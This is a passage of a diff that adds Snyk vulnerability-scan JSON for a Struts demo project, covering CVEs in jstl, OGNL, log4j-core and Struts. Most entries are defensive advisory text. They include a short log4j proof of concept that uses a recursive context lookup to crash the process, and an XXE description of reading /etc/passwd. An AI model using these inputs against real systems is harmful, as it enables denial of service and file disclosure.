"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## 
Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + 
"id": "SNYK-JAVA-OGNL-30474", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Tao Wang" + ], + "semver": { + "vulnerable": [ + "[,3.0.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.0.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "ognl:ognl", + "references": [ + { + "url": "https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.218889Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all 
aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "ognl:ognl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.659000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "ognl", + "artifactId": "ognl" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "ognl:ognl@3.0.6" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "ognl:ognl@3.0.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "ognl:ognl", + "version": "3.0.6" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": 
{ + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. 
\r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + 
"2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging 
library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", 
+ "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "title": "Man-in-the-Middle (MitM)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.13.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.13.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html", + "title": "Atlassian Patch" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b", + "title": "GitHub Commit" + }, + { + "url": 
"https://issues.apache.org/jira/browse/LOG4J2-2819", + "title": "Jira Issue" + }, + { + "url": "https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9", + "title": "Reload4j Fix Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": "2024-03-11T09:51:18.869400Z" + }, + { + "assigner": "Red Hat", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-14T11:19:13.272608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:18.869400Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Red Hat", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. 
This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or higher.\n## References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n", + "epssDetails": { + "percentile": "0.56903", + "probability": "0.00191", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9488" + ], + "CWE": [ + "CWE-297" + ], + "GHSA": [ + "GHSA-vwqq-5vrc-xw9h" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2020-04-28T15:10:06.231410Z", + "functions_new": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-27T17:16:14Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2020-04-28T17:16:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-14T11:19:13.272608Z", + "socialTrendAlert": false, + 
"severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.13.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Chris McCown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe", + "title": "GitHub Commit" + }, + { + "url": "https://securitylab.github.com/research/apache-struts-double-evaluation/", + "title": "GitHub Security Lab - Double Evaluation in Struts" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-062", + "title": "Struts Security Advisory" + }, + { + "url": "https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html", + "title": "Write Up & PoC" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": 
"3.1", + "modificationTime": "2024-03-06T13:55:56.453682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n", + "epssDetails": { + "percentile": "0.96232", + "probability": "0.18558", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-31805" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2022-04-12T20:32:06.687703Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-12T20:27:34Z", + 
"exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2022-04-12T20:33:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:18.536966Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "title": "Manipulation of Struts' internals", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Viettel Information Security Center" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + 